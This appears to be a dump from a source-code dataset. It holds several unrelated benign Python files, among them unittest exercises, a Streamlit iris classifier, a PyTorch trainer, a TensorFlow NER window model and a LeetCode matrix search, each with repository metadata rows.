    and 'ay' is appended; the whole sentence is then lower-cased with only
    its first character capitalized.
    """
    translated = []
    for word in text.split(" "):
        # word[0] raises IndexError for an empty word, matching the
        # original behaviour on consecutive spaces.
        translated.append(word[1:] + word[0] + "ay")
    return " ".join(translated).lower().capitalize()
# Here's our "unit tests".
class Lesson1Tests(unittest.TestCase):
    """Unit tests for the exercise functions defined above; expected values
    follow the exercise statements (CodingBat-style semantics)."""
    def testArrayFront9(self):
        self.assertEqual(array_front9([1, 2, 9, 3, 4]), True)
        self.assertEqual(array_front9([1, 2, 3, 4, 9]), False)
        self.assertEqual(array_front9([1, 2, 3, 4, 5]), False)
    def testStringTimes(self):
        self.assertEqual(string_times('Hel', 2), 'HelHel')
        self.assertEqual(string_times('Toto', 1), 'Toto')
        self.assertEqual(string_times('P', 4), 'PPPP')
    def testLast2(self):
        # End substring is never counted; overlapping matches are.
        self.assertEqual(last2('hixxhi'), 1)
        self.assertEqual(last2('xaxxaxaxx'), 1)
        self.assertEqual(last2('axxxaaxx'), 2)
    def testLengthWord(self):
        self.assertEqual(length_words(['hello', 'toto']), [5, 4])
        self.assertEqual(length_words(
            ['s', 'ss', '59fk', 'flkj3']), [1, 2, 4, 5])
    def testNumber2Digits(self):
        self.assertEqual(number2digits(8849), [8, 8, 4, 9])
        self.assertEqual(number2digits(4985098), [4, 9, 8, 5, 0, 9, 8])
    def testPigLatin(self):
        self.assertEqual(pigLatin("The quick brown fox"),
                         "Hetay uickqay rownbay oxfay")
"Hetay uickqay rownbay oxfay")
def main():
    """Run the unit tests via unittest's CLI runner."""
    unittest.main()
if __name__ == '__main__':
    main()
| [
"pycasa@gmail.com"
] | pycasa@gmail.com |
f789b859c8548d0cde3a2a1d0d92f48e291ed514 | 3d12a844953e83b3ae13b1788fedf8cce5d33de9 | /program.py | a76c6d7312b50ae2c5d070b6cfb746b2b43d1d1e | [] | no_license | karthik0500/analyze | 8cd14ff01d8dea77564ad778cd752823a102fe71 | 9de5da46c994f65a307ca5a98ae45ff64020c614 | refs/heads/main | 2023-06-11T04:36:26.448762 | 2021-07-04T04:36:51 | 2021-07-04T04:36:51 | 382,659,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,333 | py |
import streamlit as st
import sklearn
import numpy as np
import pandas as pd
from sklearn import datasets
from sklearn.ensemble import RandomForestClassifier
st.write("""Simple Iris Flower Prediction""")
st.sidebar.header('User Input parameter')
def User_Input_Features():
sepal_length = st.sidebar.slider('sepal_length',4.3, 7.9, 5.4)
sepal_width = st.sidebar.slider('sepal_width',3.5, 7.9, 5.4)
petal_length = st.sidebar.slider('petal_length',1.4, 7.9, 5.4)
petal_width = st.sidebar.slider('petal_width',0.2, 7.9, 5.4)
data = { 'sepal_length' :sepal_length ,
'sepal_width':sepal_width,
'petal_length' : petal_length,
'petal_width' : petal_width
}
features = pd.DataFrame(data,index = [0])
return features
df = User_Input_Features()
st.subheader('User Input Parameter')
st.write(df)
iris = datasets.load_iris()
x= iris.data
y = iris.target
classify = RandomForestClassifier()
classify.fit(x,y)
prediction = classify.predict(df)
prediction_probability = classify.predict_proba(df)
st.subheader('class label and their corresponding index number')
st.write(iris.target_names)
st.subheader('Prediction')
st.write(iris.target_names[prediction])
st.subheader('Prediction Probability')
st.write(prediction_probability)
st.bar_chart(prediction_probability)
| [
"noreply@github.com"
] | noreply@github.com |
e15132e5771bf4da3f169285b889ad3627901912 | 63fdf9369b28cf956789a374ab9e237da250ab82 | /forgebox/ftorch/train.py | fc18cc026af955dc054aca3143e6fb4fdc7d2605 | [] | no_license | raynardj/forge | a9fc66a9cc6d08856a2ca83f4c6f6e76058ad8e9 | 81a10c443b31ed13dd615f58a4f322657e656244 | refs/heads/master | 2023-07-06T08:53:14.453836 | 2019-08-26T07:53:27 | 2019-08-26T07:53:27 | 168,506,241 | 7 | 0 | null | 2023-06-22T19:59:32 | 2019-01-31T10:24:54 | Python | UTF-8 | Python | false | false | 2,623 | py | import __main__ as main
from torch.utils.data import DataLoader
from collections import namedtuple
# Detect whether we are running inside IPython/Jupyter: a plain Python
# process has no `get_ipython` attribute on __main__.  Previously a bare
# `except:` swallowed every exception (including KeyboardInterrupt /
# SystemExit); only AttributeError is expected from this probe.
try:
    JUPYTER = True if main.get_ipython else False
except AttributeError:
    JUPYTER = False
if JUPYTER: from tqdm import tqdm_notebook as tn
# Lightweight record for one training step: epoch index, batch index,
# the batch data, and the owning trainer.
TrainerBatch = namedtuple("TrainerBatch", ("epoch", "i", "data", "trainer"))
from forgebox.train import Trainer as Universal_Trainer
class Trainer(Universal_Trainer):
    """PyTorch-specific trainer: wraps datasets in DataLoaders and defers
    the training loop to the universal Trainer base class."""

    def __init__(self, dataset, val_dataset=None, batch_size=16, fg=None,
                 print_on=20, fields=None, is_log=True, shuffle=True, num_workers=4,
                 conn=None, modelName="model", tryName="try", callbacks=None, val_callbacks=None):
        """
        Pytorch trainer
        fields: the fields you choose to print out
        is_log: writing a log?
        Training:
            write action function for a step of training,
            assuming a generator will spit out tuple x,y,z in each:
            then pass the function to object
            t=Trainer(...)
            t.train(epochs = 30)
            @t.step_train
            def action(batch):
                x,y,z = batch.data
                x,y,z = x.cuda(),y.cuda(),z.cuda()
                #optimizer is a global variable, or many different optimizers if you like
                sgd.zero_grad()
                adam.zero_grad()
                # model is a global variable, or many models if you like
                y_ = model(x)
                y2_ = model_2(z)
                ...... more param updating details here
                return {"loss":loss.data[0],"acc":accuracy.data[0]}
        same work for validation:trainer.val_action = val_action
        conn: a sql table connection, (sqlalchemy). if assigned value, save the record in the designated sql database;
        """
        # Fix for the classic mutable-default-argument pitfall: the old
        # `callbacks=[]` defaults were shared across every Trainer instance.
        # `None` now stands in for "no callbacks" and is normalized here,
        # which is backward-compatible for all existing callers.
        callbacks = [] if callbacks is None else callbacks
        val_callbacks = [] if val_callbacks is None else val_callbacks
        train_data = DataLoader(dataset, batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)
        # Validation loader is optional; skip it entirely when no
        # validation dataset was supplied.
        val_data = DataLoader(val_dataset, batch_size=batch_size, shuffle=shuffle,
                              num_workers=num_workers) if val_dataset else None
        train_len = len(train_data)
        val_len = len(val_data) if val_data else None
        super().__init__(train_data, train_len=train_len, val_data=val_data, val_len=val_len,
                         fg=fg, print_on=print_on, fields=fields,
                         is_log=is_log, conn=conn, modelName=modelName,
                         tryName=tryName, callbacks=callbacks, val_callbacks=val_callbacks
                         )
| [
"raynard@rasenn.com"
] | raynard@rasenn.com |
cb51efd3406c8c2cc66cb2f9fbe807f889d82670 | ae043a0200f4dc087c30b2cadddc98d63577df71 | /scripts/Rigging/create_Obj.py | 463f6e7ea6ef48ab98c94840416b63b34ab1128b | [] | no_license | RiggerLiuqi/lqMayaScript | b7ba2dfcfc1a3581beedbba6d70ca0e68282cb38 | cb51742fa712b783744e6192f5b29b43155f392d | refs/heads/master | 2022-06-24T04:03:19.898782 | 2020-05-10T18:33:05 | 2020-05-10T18:33:05 | 262,835,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | # -*- coding: utf-8 -*-#
# -------------------------------------------------------------------------------#
# .@FileName: create_Obj
# .@Author: CousinRig67
# .@Date: 2020-04-20
# .@Contact: 842076056@qq.com
# -------------------------------------------------------------------------------#
from createObjectAtAvg import createObject
def main(*args):
    """Entry point (Maya UI callback signature): launch the
    create-object-at-average tool."""
    # NOTE(review): `obj_ui` is assigned but never used -- presumably
    # craObjAtAvg() builds its UI as a side effect; confirm.
    obj_ui = createObject.craObjAtAvg()
"842076056@qq.com"
] | 842076056@qq.com |
709c6e0719bab7bb2ce4a850c3240d1058ed4ca9 | c09545034e6a4c65e88ad5d0d214ce571b8e6ec6 | /jinritoutiao/items.py | f2826f48364055c55b3b98ed4de38e4ed55d1e84 | [] | no_license | hdxj/jinritoutiao | 5757fca221629c70e9261566ae7289c419502f75 | f306aabbd454f3adad8ebc5e1e8ca62d6636a490 | refs/heads/master | 2021-01-20T05:43:57.093773 | 2017-08-26T06:41:18 | 2017-08-26T06:41:18 | 101,467,854 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class JinritoutiaoItem(scrapy.Item):
    """Scrapy item for a scraped Toutiao article: summary/abstract, genre,
    tag/label metadata, source info, title, body content, and timestamp."""
    abstract = scrapy.Field()
    article_genre = scrapy.Field()
    chinese_tag = scrapy.Field()
    label = scrapy.Field()
    source = scrapy.Field()
    source_url = scrapy.Field()
    tag = scrapy.Field()
    title = scrapy.Field()
    content = scrapy.Field()
    time = scrapy.Field()
| [
"lqrschen@163.com"
] | lqrschen@163.com |
da0b836d9ee3e8f5c77c7ae1b030681c959bd465 | 0a4d0925577e77d2fc2f92a572e259fcbd3f0b9f | /assignment3/q1_window.py | 50e0ca73cdf52f1cf62e6f53e081992556f567a4 | [] | no_license | Jacobsolawetz/stanford-cs224n | 7a80c2c89625052771c0ef2c0e64703d34c74358 | 78db134c7cebd8e4afb36b454d522ad99be1561f | refs/heads/master | 2020-04-26T14:21:18.884356 | 2019-03-03T18:02:57 | 2019-03-03T18:02:57 | 173,610,554 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,404 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Q1: A window into NER
"""
from __future__ import absolute_import
from __future__ import division
import argparse
import sys
import time
import logging
from datetime import datetime
import tensorflow as tf
from util import print_sentence, write_conll
from data_util import load_and_preprocess_data, load_embeddings, read_conll, ModelHelper
from ner_model import NERModel
from defs import LBLS
#from report import Report
# Module logger plus a root basicConfig so DEBUG output reaches stderr.
logger = logging.getLogger("hw3.q1")
logger.setLevel(logging.DEBUG)
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
class Config:
    """Holds model hyperparams and data information.

    The config class is used to store various hyperparameters and dataset
    information parameters. Model objects are passed a Config() object at
    instantiation.
    """
    n_word_features = 2  # Number of features for every word in the input.
    window_size = 1      # The size of the window to use.
    # Total features per window: the center token plus `window_size`
    # neighbors on each side, each contributing n_word_features.
    # (Previously a dead placeholder `n_window_features = 0` preceded this
    # definition; it was always overwritten and has been removed.)
    n_window_features = (2 * window_size + 1) * n_word_features
    n_classes = 5
    dropout = 0.5
    embed_size = 50
    hidden_size = 200
    batch_size = 2048
    n_epochs = 10
    lr = 0.001

    def __init__(self, output_path=None):
        """Set up output file locations, defaulting to a timestamped
        results directory when no explicit output_path is given."""
        if output_path:
            # Where to save things.
            self.output_path = output_path
        else:
            self.output_path = "results/window/{:%Y%m%d_%H%M%S}/".format(datetime.now())
        self.model_output = self.output_path + "model.weights"
        self.eval_output = self.output_path + "results.txt"
        self.log_output = self.output_path + "log"
        self.conll_output = self.output_path + "window_predictions.conll"
def make_windowed_data(data, start, end, window_size = 1):
    """Convert per-sentence examples into per-token windowed examples.

    For every token of every sentence, the features of the `window_size`
    neighbors on each side are concatenated around the token's own
    features; positions falling off either edge of the sentence are
    filled with the featurized `start` / `end` padding tokens.

    Args:
        data: iterable of (sentence, labels) pairs; each sentence is a
            list of per-word feature lists, labels the matching list of
            output labels.
        start: featurized padding token used before the sentence begins.
        end: featurized padding token used after the sentence ends.
        window_size: number of neighbors taken on each side of a token.
    Returns:
        A list of (window_features, label) pairs, one per token, where
        window_features is a flat list of
        (2 * window_size + 1) * n_features values.

    With start=[5,8], end=[6,8] and the example sentence from the module
    docstring this yields
        [([5, 8, 1, 9, 2, 9], 1),
         ([1, 9, 2, 9, 3, 8], 1),
         ...
        ]
    """
    windowed_data = []
    for sentence, labels in data:
        n_tokens = len(sentence)
        for center in range(n_tokens):
            window = []
            # Walk symmetric offsets -window_size .. +window_size and clamp
            # out-of-range positions to the start/end padding tokens.
            for offset in range(-window_size, window_size + 1):
                position = center + offset
                if position < 0:
                    window.extend(start)
                elif position >= n_tokens:
                    window.extend(end)
                else:
                    window.extend(sentence[position])
            windowed_data.append((window, labels[center]))
    return windowed_data
class WindowModel(NERModel):
"""
Implements a feedforward neural network with an embedding layer and
single hidden layer.
This network will predict what label (e.g. PER) should be given to a
given token (e.g. Manning) by using a featurized window around the token.
"""
def add_placeholders(self):
"""Generates placeholder variables to represent the input tensors
These placeholders are used as inputs by the rest of the model building and will be fed
data during training. Note that when "None" is in a placeholder's shape, it's flexible
(so we can use different batch sizes without rebuilding the model).
Adds following nodes to the computational graph
input_placeholder: Input placeholder tensor of shape (None, n_window_features), type tf.int32
labels_placeholder: Labels placeholder tensor of shape (None,), type tf.int32
dropout_placeholder: Dropout value placeholder (scalar), type tf.float32
Add these placeholders to self as the instance variables
self.input_placeholder
self.labels_placeholder
self.dropout_placeholder
(Don't change the variable names)
"""
### YOUR CODE HERE (~3-5 lines)
#need to find where n_window_features comes from
self.input_placeholder = tf.placeholder(tf.int32, [None, self.config.n_window_features] )
self.labels_placeholder = tf.placeholder(tf.int32, [None,] )
self.dropout_placeholder = tf.placeholder(tf.float32, shape=())
### END YOUR CODE
def create_feed_dict(self, inputs_batch, labels_batch=None, dropout=1):
"""Creates the feed_dict for the model.
A feed_dict takes the form of:
feed_dict = {
<placeholder>: <tensor of values to be passed for placeholder>,
....
}
Hint: The keys for the feed_dict should be a subset of the placeholder
tensors created in add_placeholders.
Hint: When an argument is None, don't add it to the feed_dict.
Args:
inputs_batch: A batch of input data.
labels_batch: A batch of label data.
dropout: The dropout rate.
Returns:
feed_dict: The feed dictionary mapping from placeholders to values.
"""
### YOUR CODE HERE (~5-10 lines)
feed_dict = {}
if inputs_batch is not None:
feed_dict[self.input_placeholder] = inputs_batch
if labels_batch is not None:
feed_dict[self.labels_placeholder] = labels_batch
if dropout is not None:
feed_dict[self.dropout_placeholder] = dropout
### END YOUR CODE
return feed_dict
def add_embedding(self):
"""Adds an embedding layer that maps from input tokens (integers) to vectors and then
concatenates those vectors:
- Creates an embedding tensor and initializes it with self.pretrained_embeddings.
- Uses the input_placeholder to index into the embeddings tensor, resulting in a
tensor of shape (None, n_window_features, embedding_size).
- Concatenates the embeddings by reshaping the embeddings tensor to shape
(-1, n_window_features * embedding_size). Here -1 means variable length.
Hint: You might find tf.nn.embedding_lookup useful.
Hint: You can use tf.reshape to concatenate the vectors. See following link to understand
what -1 in a shape means.
https://www.tensorflow.org/api_docs/python/array_ops/shapes_and_shaping#reshape.
Returns:
embeddings: tf.Tensor of shape (None, n_window_features*embed_size)
"""
### YOUR CODE HERE (!3-5 lines)
# self.inputs_placeholder (None, N_window_features)
embedding_tensor = tf.constant(self.pretrained_embeddings)
embedding_staging = tf.nn.embedding_lookup(embedding_tensor, self.input_placeholder, partition_strategy='mod', name=None)
embeddings = tf.reshape(embedding_staging,(-1,self.config.n_window_features*self.config.embed_size))
### END YOUR CODE
return embeddings
def add_prediction_op(self):
"""Adds the 1-hidden-layer NN:
h = Relu(xW + b1)
h_drop = Dropout(h, dropout_rate)
pred = h_dropU + b2
Recall that we are not applying a softmax to pred. The softmax will instead be done in
the add_loss_op function, which improves efficiency because we can use
tf.nn.softmax_cross_entropy_with_logits
When creating a new variable, use the tf.get_variable function
because it lets us specify an initializer.
Use tf.contrib.layers.xavier_initializer to initialize matrices.
This is TensorFlow's implementation of the Xavier initialization
trick we used in last assignment.
Note: tf.nn.dropout takes the keep probability (1 - p_drop) as an argument.
The keep probability should be set to the value of dropout_rate.
Returns:
pred: tf.Tensor of shape (batch_size, n_classes)
"""
x = self.add_embedding()
dropout_rate = self.dropout_placeholder
### YOUR CODE HERE (~10-20 lines)
W = tf.get_variable("W", shape=[self.config.n_window_features*self.config.embed_size, self.config.hidden_size],
initializer=tf.contrib.layers.xavier_initializer())
b1 = tf.get_variable("b1", shape = [self.config.hidden_size], initializer=tf.contrib.layers.xavier_initializer())
h = tf.nn.relu(tf.matmul(x,W) + b1)
h_drop = tf.nn.dropout(h,dropout_rate)
U = tf.get_variable("U", shape=[self.config.hidden_size, self.config.n_classes],
initializer=tf.contrib.layers.xavier_initializer())
b2 = tf.get_variable("b2", shape = [self.config.n_classes], initializer=tf.contrib.layers.xavier_initializer())
pred = tf.matmul(h_drop,U) + b2
### END YOUR CODE
return pred
def add_loss_op(self, pred):
"""Adds Ops for the loss function to the computational graph.
In this case we are using cross entropy loss.
The loss should be averaged over all examples in the current minibatch.
Remember that you can use tf.nn.sparse_softmax_cross_entropy_with_logits to simplify your
implementation. You might find tf.reduce_mean useful.
Args:
pred: A tensor of shape (batch_size, n_classes) containing the output of the neural
network before the softmax layer.
Returns:
loss: A 0-d tensor (scalar)
"""
### YOUR CODE HERE (~2-5 lines)
loss_array = tf.nn.sparse_softmax_cross_entropy_with_logits(labels = self.labels_placeholder, logits = pred)
loss = tf.reduce_mean(loss_array)
### END YOUR CODE
return loss
def add_training_op(self, loss):
"""Sets up the training Ops.
Creates an optimizer and applies the gradients to all trainable variables.
The Op returned by this function is what must be passed to the
`sess.run()` call to cause the model to train. See
https://www.tensorflow.org/versions/r0.7/api_docs/python/train.html#Optimizer
for more information.
Use tf.train.AdamOptimizer for this model.
Calling optimizer.minimize() will return a train_op object.
Args:
loss: Loss tensor, from cross_entropy_loss.
Returns:
train_op: The Op for training.
"""
### YOUR CODE HERE (~1-2 lines)
train_op = tf.train.AdamOptimizer().minimize(loss)
### END YOUR CODE
return train_op
def preprocess_sequence_data(self, examples):
return make_windowed_data(examples, start=self.helper.START, end=self.helper.END, window_size=self.config.window_size)
def consolidate_predictions(self, examples_raw, examples, preds):
"""Batch the predictions into groups of sentence length.
"""
ret = []
#pdb.set_trace()
i = 0
for sentence, labels in examples_raw:
labels_ = preds[i:i+len(sentence)]
i += len(sentence)
ret.append([sentence, labels, labels_])
return ret
def predict_on_batch(self, sess, inputs_batch):
"""Make predictions for the provided batch of data
Args:
sess: tf.Session()
input_batch: np.ndarray of shape (n_samples, n_features)
Returns:
predictions: np.ndarray of shape (n_samples, n_classes)
"""
feed = self.create_feed_dict(inputs_batch)
predictions = sess.run(tf.argmax(self.pred, axis=1), feed_dict=feed)
return predictions
def train_on_batch(self, sess, inputs_batch, labels_batch):
    """Run one optimization step on a batch and return its loss value."""
    feed = self.create_feed_dict(inputs_batch, labels_batch=labels_batch,
                                 dropout=self.config.dropout)
    # Running train_op applies the gradient update; its result is discarded.
    _, loss = sess.run([self.train_op, self.loss], feed_dict=feed)
    return loss
def __init__(self, helper, config, pretrained_embeddings, report=None):
    """Store configuration and embeddings, then build the TF graph."""
    super(WindowModel, self).__init__(helper, config, report)
    self.pretrained_embeddings = pretrained_embeddings
    # Defining placeholders.
    self.input_placeholder = None
    self.labels_placeholder = None
    self.dropout_placeholder = None
    # Assembles the full graph: placeholders, prediction, loss, train op.
    self.build()
def test_make_windowed_data():
    """Sanity-check make_windowed_data on a tiny hand-computed example."""
    sentences = [[[1,1], [2,0], [3,3]]]
    sentence_labels = [[1, 2, 3]]
    data = zip(sentences, sentence_labels)
    # window_size=1 means one token of context on each side; boundaries are
    # padded with the start=[5,0] / end=[6,0] sentinel feature vectors.
    w_data = make_windowed_data(data, start=[5,0], end=[6,0], window_size=1)
    # One window example per input token.
    assert len(w_data) == sum(len(sentence) for sentence in sentences)
    assert w_data == [
        ([5,0] + [1,1] + [2,0], 1,),
        ([1,1] + [2,0] + [3,3], 2,),
        ([2,0] + [3,3] + [6,0], 3,),
    ]
def do_test1(_):
    """CLI entry point for `test1`: run the windowing unit test."""
    logger.info("Testing make_windowed_data")
    test_make_windowed_data()
    logger.info("Passed!")
def do_test2(args):
    """CLI entry point for `test2`: fit WindowModel on tiny data as a smoke test."""
    logger.info("Testing implementation of WindowModel")
    config = Config()
    helper, train, dev, train_raw, dev_raw = load_and_preprocess_data(args)
    embeddings = load_embeddings(args, helper)
    config.embed_size = embeddings.shape[1]
    with tf.Graph().as_default():
        logger.info("Building model...",)
        start = time.time()
        model = WindowModel(helper, config, embeddings)
        logger.info("took %.2f seconds", time.time() - start)
        init = tf.global_variables_initializer()
        # No checkpointing for the smoke test.
        saver = None
        with tf.Session() as session:
            session.run(init)
            model.fit(session, saver, train, dev)
    logger.info("Model did not crash!")
    logger.info("Passed!")
def do_train(args):
    """CLI entry point for `train`: fit WindowModel on the full data set and
    write dev-set predictions in CoNLL and human-readable formats."""
    # Set up some parameters.
    config = Config()
    helper, train, dev, train_raw, dev_raw = load_and_preprocess_data(args)
    embeddings = load_embeddings(args, helper)
    config.embed_size = embeddings.shape[1]
    helper.save(config.output_path)
    # Mirror all log output into this run's log file.
    handler = logging.FileHandler(config.log_output)
    handler.setLevel(logging.DEBUG)
    handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s: %(message)s'))
    logging.getLogger().addHandler(handler)
    report = None #Report(Config.eval_output)
    with tf.Graph().as_default():
        logger.info("Building model...",)
        start = time.time()
        model = WindowModel(helper, config, embeddings)
        logger.info("took %.2f seconds", time.time() - start)
        init = tf.global_variables_initializer()
        saver = tf.train.Saver()
        with tf.Session() as session:
            session.run(init)
            model.fit(session, saver, train, dev)
            if report:
                report.log_output(model.output(session, dev_raw))
                report.save()
            else:
                # Save predictions in a text file.
                output = model.output(session, dev_raw)
                sentences, labels, predictions = zip(*output)
                # Convert numeric label ids back to tag strings.
                predictions = [[LBLS[l] for l in preds] for preds in predictions]
                # Materialize as a list: `output` is consumed twice below,
                # and under Python 3 zip() returns a one-shot iterator
                # (the second loop would silently see nothing).
                output = list(zip(sentences, labels, predictions))
                with open(model.config.conll_output, 'w') as f:
                    write_conll(f, output)
                with open(model.config.eval_output, 'w') as f:
                    for sentence, labels, predictions in output:
                        print_sentence(f, sentence, labels, predictions)
def do_evaluate(args):
    """CLI entry point for `evaluate`: restore a trained model and print
    predictions for every sentence of a CoNLL file."""
    config = Config(args.model_path)
    helper = ModelHelper.load(args.model_path)
    input_data = read_conll(args.data)
    embeddings = load_embeddings(args, helper)
    config.embed_size = embeddings.shape[1]
    with tf.Graph().as_default():
        logger.info("Building model...",)
        start = time.time()
        model = WindowModel(helper, config, embeddings)
        logger.info("took %.2f seconds", time.time() - start)
        init = tf.global_variables_initializer()
        saver = tf.train.Saver()
        with tf.Session() as session:
            session.run(init)
            # Restore the weights checkpointed by `do_train`.
            saver.restore(session, model.config.model_output)
            for sentence, labels, predictions in model.output(session, input_data):
                # Convert numeric label ids back to tag strings.
                predictions = [LBLS[l] for l in predictions]
                print_sentence(args.output, sentence, labels, predictions)
def do_shell(args):
    """CLI entry point for `shell`: interactive REPL that tags typed sentences."""
    config = Config(args.model_path)
    helper = ModelHelper.load(args.model_path)
    embeddings = load_embeddings(args, helper)
    config.embed_size = embeddings.shape[1]
    with tf.Graph().as_default():
        logger.info("Building model...",)
        start = time.time()
        model = WindowModel(helper, config, embeddings)
        logger.info("took %.2f seconds", time.time() - start)
        init = tf.global_variables_initializer()
        saver = tf.train.Saver()
        with tf.Session() as session:
            session.run(init)
            saver.restore(session, model.config.model_output)
            print("""Welcome!
You can use this shell to explore the behavior of your model.
Please enter sentences with spaces between tokens, e.g.,
input> Germany 's representative to the European Union 's veterinary committee .
""")
            while True:
                # Create simple REPL
                try:
                    # raw_input: this script targets Python 2.
                    sentence = raw_input("input> ")
                    tokens = sentence.strip().split(" ")
                    # Dummy "O" gold labels: only the predictions matter here.
                    for sentence, _, predictions in model.output(session, [(tokens, ["O"] * len(tokens))]):
                        predictions = [LBLS[l] for l in predictions]
                        print_sentence(sys.stdout, sentence, [""] * len(tokens), predictions)
                except EOFError:
                    # Ctrl-D ends the session cleanly.
                    print("Closing session.")
                    break
# Script entry point: dispatch to the sub-command handler selected on the
# command line (test1 / test2 / train / evaluate / shell).
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Trains and tests an NER model')
    subparsers = parser.add_subparsers()
    command_parser = subparsers.add_parser('test1', help='')
    command_parser.set_defaults(func=do_test1)
    command_parser = subparsers.add_parser('test2', help='')
    command_parser.add_argument('-dt', '--data-train', type=argparse.FileType('r'), default="data/tiny.conll", help="Training data")
    command_parser.add_argument('-dd', '--data-dev', type=argparse.FileType('r'), default="data/tiny.conll", help="Dev data")
    command_parser.add_argument('-v', '--vocab', type=argparse.FileType('r'), default="data/vocab.txt", help="Path to vocabulary file")
    command_parser.add_argument('-vv', '--vectors', type=argparse.FileType('r'), default="data/wordVectors.txt", help="Path to word vectors file")
    command_parser.set_defaults(func=do_test2)
    command_parser = subparsers.add_parser('train', help='')
    command_parser.add_argument('-dt', '--data-train', type=argparse.FileType('r'), default="data/train.conll", help="Training data")
    command_parser.add_argument('-dd', '--data-dev', type=argparse.FileType('r'), default="data/dev.conll", help="Dev data")
    command_parser.add_argument('-v', '--vocab', type=argparse.FileType('r'), default="data/vocab.txt", help="Path to vocabulary file")
    command_parser.add_argument('-vv', '--vectors', type=argparse.FileType('r'), default="data/wordVectors.txt", help="Path to word vectors file")
    command_parser.set_defaults(func=do_train)
    command_parser = subparsers.add_parser('evaluate', help='')
    command_parser.add_argument('-d', '--data', type=argparse.FileType('r'), default="data/dev.conll", help="Training data")
    command_parser.add_argument('-m', '--model-path', help="Training data")
    command_parser.add_argument('-v', '--vocab', type=argparse.FileType('r'), default="data/vocab.txt", help="Path to vocabulary file")
    command_parser.add_argument('-vv', '--vectors', type=argparse.FileType('r'), default="data/wordVectors.txt", help="Path to word vectors file")
    command_parser.add_argument('-o', '--output', type=argparse.FileType('w'), default=sys.stdout, help="Training data")
    command_parser.set_defaults(func=do_evaluate)
    command_parser = subparsers.add_parser('shell', help='')
    command_parser.add_argument('-m', '--model-path', help="Training data")
    command_parser.add_argument('-v', '--vocab', type=argparse.FileType('r'), default="data/vocab.txt", help="Path to vocabulary file")
    command_parser.add_argument('-vv', '--vectors', type=argparse.FileType('r'), default="data/wordVectors.txt", help="Path to word vectors file")
    command_parser.set_defaults(func=do_shell)
    ARGS = parser.parse_args()
    # When no subcommand is supplied, argparse produces a Namespace with no
    # `func` attribute at all, so the original `ARGS.func is None` raised
    # AttributeError instead of printing help; getattr covers both cases.
    if getattr(ARGS, "func", None) is None:
        parser.print_help()
        sys.exit(1)
    else:
        ARGS.func(ARGS)
| [
"jacobsolawetz@gmail.com"
] | jacobsolawetz@gmail.com |
5bfdfd70e551c90834a8033de5bf56429dacecac | b5e5792c66d61af45b9f93b1a289045f9dbbab96 | /api/migrations/0005_auto_20200509_0112.py | 1e84495100ebf6da261816be2b48bf2d4190df60 | [] | no_license | frankiegu/ecust_annotation | 4c39da1ac4ae643d388f6859f79195139634d2b0 | 115a15942c0ca3b32f06f74d23b3bce6c5ed0163 | refs/heads/master | 2022-10-12T04:15:25.272851 | 2020-05-11T00:39:57 | 2020-05-11T00:39:57 | 295,602,620 | 0 | 3 | null | 2020-09-15T03:19:14 | 2020-09-15T03:19:13 | null | UTF-8 | Python | false | false | 730 | py | # Generated by Django 2.2.5 on 2020-05-09 01:12
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated schema migration for the `api` app: adds a new
    # `standard` ForeignKey to the Dic model and redefines the
    # `entity_template` ForeignKey. Do not hand-edit once applied.

    dependencies = [
        ('api', '0004_auto_20200508_0951'),
    ]

    operations = [
        # NOTE(review): default='' on a ForeignKey is unusual -- it only
        # exists to satisfy the backfill for pre-existing rows.
        migrations.AddField(
            model_name='dic',
            name='standard',
            field=models.ForeignKey(default='', on_delete=django.db.models.deletion.CASCADE, related_name='dic', to='api.Standard'),
        ),
        migrations.AlterField(
            model_name='dic',
            name='entity_template',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='dic', to='api.Entity_template'),
        ),
    ]
| [
"kyrieming@126.com"
] | kyrieming@126.com |
e9e335201ab716e0b4e0c4dd41ecd24d930e054d | b7eb41b068614e04f38a969326f43d8f8119cb05 | /74_search_a_2d_matrix.py | ca546b4123fa5936447cab9c7edc0057dcffd1b4 | [] | no_license | YI-DING/daily-leetcode | ddfb6985bf5014886cba8d6219da243e0aa28d71 | a6d3898d900f2063302dc1ffc3dafd61eefa79b7 | refs/heads/master | 2020-05-19T06:07:21.557077 | 2019-07-19T16:31:46 | 2019-07-19T16:31:46 | 184,866,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,009 | py | class Solution:
def searchMatrix(self, matrix: List[List[int]], target: int):
    """Return True iff *target* occurs in *matrix* (LeetCode 74).

    Each row is sorted and each row's first element is greater than the
    previous row's last, so the matrix is one sorted sequence of m*n
    values when read row-major. Instead of two separate binary searches
    (row pick, then in-row search, with duplicated return branches and a
    comment that mislabelled them as "BFS"), binary-search that virtual
    flat array directly: index k maps to matrix[k // n][k % n].
    O(log(m*n)) time, O(1) space.
    """
    if not matrix or not matrix[0]:
        # Empty matrix or empty rows: nothing to find.
        return False
    cols = len(matrix[0])
    lo, hi = 0, len(matrix) * cols - 1
    while lo <= hi:
        mid = (lo + hi) // 2
        value = matrix[mid // cols][mid % cols]
        if value == target:
            return True
        if value < target:
            lo = mid + 1
        else:
            hi = mid - 1
    return False
#however you could see it as len(m*n) and do binary search for only once | [
"yiding1@uchicago.edu"
] | yiding1@uchicago.edu |
bda08bb1e8392fe0495c5b0f7bc2ba3dc882b580 | 8dc84558f0058d90dfc4955e905dab1b22d12c08 | /third_party/android_ndk/toolchains/llvm/prebuilt/linux-x86_64/tools/scan-view/share/startfile.py | 673935909f823467ad1dd737788133966d2a00e3 | [
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"NCSA",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-arm-llvm-sga",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
